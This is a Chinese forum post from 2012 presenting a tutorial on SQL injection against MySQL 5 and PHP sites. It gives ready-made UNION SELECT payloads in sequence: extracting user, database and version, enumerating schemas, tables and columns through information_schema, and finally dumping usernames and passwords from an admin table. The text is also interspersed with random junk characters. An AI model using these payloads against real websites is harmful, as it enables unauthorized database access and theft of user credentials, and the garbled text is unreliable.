3 u0 o9 h& N3 o教程内容:Mysql 5+php 注入6 | ?! n6 L+ c7 a
@1 j$ q2 b' |2 s2 k+ K9 l6 K; \( U
& M6 @2 i) u7 r' P" S! R! N% K; J' `7 w9 x% h
一.查看MYSQL基本信息(库名,版本,用户)7 I3 n) p! Y5 `9 h% v8 _& @- o
y$ g" f0 z! ]* i
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
. P; ?+ |( ~* V, }; y" d+ h, } r0 N4 C( S: `2 k
二.查数据库3 Y: O) I4 W/ ]/ f' i- w3 h
, M- @- Y; f. j0 x5 C9 j6 j( Nand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
- y( G: `* d" s2 c% glimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。* H" o& T2 y, O% m5 \/ ^
4 @% {" F0 z3 O c4 X三.暴表 P9 {% n8 ]( }' ~+ q5 J: w0 G8 ^ h
* P7 Q" v: J4 N# q$ D( r* D3 Land 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*, e( m' K# }# Q* ] S
8 E: G H/ s5 t1 t! C& n; f% ]) R- J
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
( {7 }/ i9 m: l; S5 Y
* D$ P/ s! Q( a! _四.暴字段8 W, _3 w0 r8 M: E. Q
7 G: l0 I" }) D+ W5 ?0 e. g5 X
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*; D ~0 X7 G* c
! G8 T2 d) `) G6 D e) Mlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。( U: v7 m r! E( j3 e; e2 w, n/ ] U% j
) ?$ v, ]0 j* |/ U9 S: ~3 g# Q( t五.暴数据
! ~4 t9 ^% P4 V2 r! e5 V
* b/ L+ z3 C: R1 D8 W$ Jand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
4 i( `, ]' [8 A; i2 }0 p o1 d# B" E/ a; m/ S9 ]9 D
7 M, Y8 q2 ?1 G; J# K/ n
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
$ ^# \3 g4 p7 z! g |
发表于 2012-9-13 16:27:53
收藏
支持
反对